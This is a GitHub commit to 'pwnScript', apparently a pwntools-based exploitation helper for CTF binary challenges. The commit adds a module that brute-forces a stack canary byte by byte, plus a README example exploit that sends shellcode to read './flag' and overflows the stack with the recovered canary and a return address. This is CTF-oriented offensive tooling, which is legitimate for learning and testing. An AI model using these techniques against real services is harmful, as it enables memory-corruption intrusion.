Added blasting to canary and fix error

c0mentropy · Jun 24, 2024 · 3f60caf · 3f60caf
1 parent 8cce7cc
commit 3f60caf
Show file tree

Hide file tree

Showing 9 changed files with 165 additions and 10 deletions.
diff --git a/PKG-INFO b/PKG-INFO
@@ -1,7 +1,7 @@
 Metadata-Version: 2.1
 Name: pwn-ckyan
-Version: 2.1.4
-Summary: pwnScript
+Version: 2.1.5
+Summary: pwnScript is a tools for exploiting vuln in ELF files.
 Home-page: https://github.com/c0mentropy/ckyan.pwnScript
 Author: Comentropy Ckyan
 Author-email: [email protected]

diff --git a/README.md b/README.md
@@ -30,6 +30,8 @@
 
 
 
+## 版本信息
+
 目前（2.1.1）有的功能：
 
 - 对pwntools常用命令封装如：send，recv，interactive等
@@ -61,7 +63,14 @@
 2.1.4新增功能：
 
 - 使用`pwnScript new exp.py --name ckyan`生成初始化脚本，主要是一些基本信息和注释之类的。
-- 修改了无法使用`pwnScript debug --file ./pwn`直接交互的bug。
+- 修复了无法使用`pwnScript debug --file ./pwn`直接交互的bug。
+
+
+
+2.1.5新增功能：
+
+- 增加了对canary逐字节爆破的功能，（仅限有的题目考点，如果题目canary损坏直接退出就不行了）
+- 修复了无法使用`pwnScript remote -u "127.0.0.1 9999"`直接交互的bug。
 
 
 
@@ -218,7 +227,7 @@ if __name__ == '__main__':
 
 ## 示例
 
-栈溢出利用，
+### 栈溢出利用
 
 ret2libc
 
@@ -424,7 +433,7 @@ if __name__ == '__main__':
 
 
 
-awd示例：
+### awd利用
 
 ```bash
 python exp.py auto
@@ -514,6 +523,78 @@ if __name__ == '__main__':
 
 
 
+### 爆破canary利用
+
+```python
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+"""
+Author: ckyan
+Generation date: 2024-06-24 13:48:16
+"""
+
+"""
+GitHub:
+    https://github.com/c0mentropy/ckyan.pwnScript
+Help: 
+    python3 exp.py --help
+    python3 exp.py debug --help
+    python3 exp.py remote --help
+Local:
+    python3 exp.py debug --file ./pwn
+Remote:
+    python3 exp.py remote --ip 127.0.0.1 --port 9999 [--file ./pwn] [--libc ./libc.so.6]
+    python3 exp.py remote --url 127.0.0.1:9999 [--file ./pwn] [--libc ./libc.so.6]
+"""
+
+# ./exp.py de -f ./guess
+# ./exp.py re -f ./guess -u ""
+
+from ckyan.pwnScript import *
+
+def exp():
+    pandora_box.init_script()
+
+    elf = pandora_box.elf
+    libc = pandora_box.libc
+    p = pandora_box.conn
+
+    shellcode = shellcraft.open('./flag')
+    shellcode += shellcraft.read(3, 0x404078, 0x30)
+    shellcode += shellcraft.write(1, 0x404078, 0x30)
+
+    sl(asm(shellcode))
+
+    padding = 0x20 - 8
+
+    canary_attacker = Canary()
+
+    canary_attacker.find_full_canary(padding=padding,
+                                     send_after_str=b'thinking?(0-1000):\n')
+
+    canary = canary_attacker.value
+
+    log_canary(uu64(canary))
+
+    pad = b''
+    pad += b'a' * padding
+    pad += canary
+    pad += b'a' * 8
+    pad += p64(0x40404000)
+
+    ru(b'In what number I am thinking?(0-1000):\n')
+    s(pad)
+
+    pattern_flag_from_data(b'flag', ra())
+
+if __name__ == '__main__':
+    exp()
+
+```
+
+
+
 
 
 ## TODO

diff --git a/ckyan/pwnScript/__init__.py b/ckyan/pwnScript/__init__.py
@@ -5,3 +5,4 @@
 from .ae64_opcode import *
 from .stack import *
 from .awd import *
+from .canary import *
diff --git a/ckyan/pwnScript/args_parser/__init__.py b/ckyan/pwnScript/args_parser/__init__.py
@@ -11,7 +11,7 @@
 | (__|   <| |_| | (_| | | | |_| |_) \ V  V /| | | |___) | (__| |  | | |_) | |_
  \___|_|\_\\__, |\__,_|_| |_(_) .__/ \_/\_/ |_| |_|____/ \___|_|  |_| .__/ \__|
            |___/              |_|                                   |_|
-                                                       PwnScript version: 2.1.4""" + "\n\n"
+                                                       PwnScript version: 2.1.5""" + "\n\n"
 
 
 class CliParser:
@@ -27,7 +27,7 @@ def __init__(self):
 
     def set_parse_arguments(self):
 
-        VERSION = "PwnScript: version 2.1.4\n" \
+        VERSION = "PwnScript: version 2.1.5\n" \
                   "Author: Comentropy Ckyan\n" \
                   "Email:  [email protected]\n" \
                   "GitHub: https://github.com/c0mentropy/ckyan.pwnScript\n"

diff --git a/ckyan/pwnScript/canary/__init__.py b/ckyan/pwnScript/canary/__init__.py
@@ -0,0 +1,55 @@
+from pwn import p8
+from ..misc import r, ru, rp, s, sl, uu64, log_canary
+from ..log4ck import debug
+
+
+class Canary:
+    def __init__(self):
+        self.value: bytes = b""
+        self.padding = 0
+
+        self.send_after_str = b''
+        self.stack_overflow_str = b'*** stack smashing detected ***: terminated'
+
+    def set_padding(self, padding: int):
+        self.padding = padding
+
+    def find_full_canary(self, padding: int = 0, send_after_str: bytes = b'', stack_overflow_str: bytes = b'***',
+                         length: int = 8, initial_canary: bytes = b'\x00', recv_length: int = 0,
+                         is_line: bool = False) -> bytes:
+
+        self.padding = padding
+        self.send_after_str = send_after_str
+        self.stack_overflow_str = stack_overflow_str
+
+        canary = initial_canary
+        for index in range(1, length):  # We start from 1 since we have the initial 0 byte
+            canary = self._find_canary_byte(canary, recv_length, is_line)
+            debug(f"Current canary: {canary}")
+
+        self.value = canary
+        log_canary(uu64(canary))
+
+        return self.value
+
+    def _find_canary_byte(self, current_canary: bytes, recv_length: int, is_line: bool):
+
+        for canary_byte_i in range(0xff):
+
+            attempt_canary = current_canary + p8(canary_byte_i)
+
+            pad = b'a' * self.padding + attempt_canary
+
+            if is_line:
+                ru(self.send_after_str)
+                sl(pad)
+            else:
+                ru(self.send_after_str)
+                s(pad)
+
+            if rp(lambda x: self.stack_overflow_str in x) != b'':
+                continue  # Incorrect byte, try the next one
+            else:
+                return attempt_canary  # Found correct byte
+
+        raise ValueError("Could not find a valid byte")  # If no valid byte is found
diff --git a/ckyan/pwnScript/connect/__init__.py b/ckyan/pwnScript/connect/__init__.py
@@ -148,3 +148,11 @@ def update_script(self, local: bool = True,
         except Exception as ex:
             error(f"{str(ex) = }")
             exit()
+
+    elif not cli_parser.local and cli_parser.ip is not None and cli_parser.port is not None:
+        try:
+            connect_io.init_script()
+            connect_io.conn.interactive()
+        except Exception as ex:
+            error(f"{str(ex) = }")
+            exit()
diff --git a/ckyan/pwnScript/debugger/__init__.py b/ckyan/pwnScript/debugger/__init__.py
@@ -68,5 +68,10 @@ def ddebug():
 
 D = ddebug
 
-if '.py' in sys.argv[0] and connect_io.local:
+if connect_io.local:
     gdb_debugger()
+
+"""
+if '.py' in sys.argv[0] or 'python' in sys.argv[0] and connect_io.local:
+    gdb_debugger()
+"""
diff --git a/ckyan/pwnScript/misc/__init__.py b/ckyan/pwnScript/misc/__init__.py
@@ -64,6 +64,11 @@ def ra(timeout: int = default_timeout):
     return connect_io.conn.recvall(timeout=timeout)
 
 
+# recvpred(self, pred, timeout = default):
+def rp(pred, timeout: int = default_timeout):
+    return connect_io.conn.recvpred(pred, timeout)
+
+
 def r7f(timeout: int = default_timeout):
     return uu64(connect_io.conn.recvuntil(b"\x7f", timeout=timeout)[-6:])
 

diff --git a/setup.py b/setup.py
@@ -1,10 +1,10 @@
 from setuptools import setup, find_packages
 setup(
       name = 'pwn-ckyan',
-      version = '2.1.4',
+      version = '2.1.5',
       author = 'Comentropy Ckyan',
       author_email = "[email protected]",
-      description = "pwnScript",
+      description = "pwnScript is a tools for exploiting vuln in ELF files.",
       packages=find_packages(),
       url="https://github.com/c0mentropy/ckyan.pwnScript",
       license='GPL-3.0',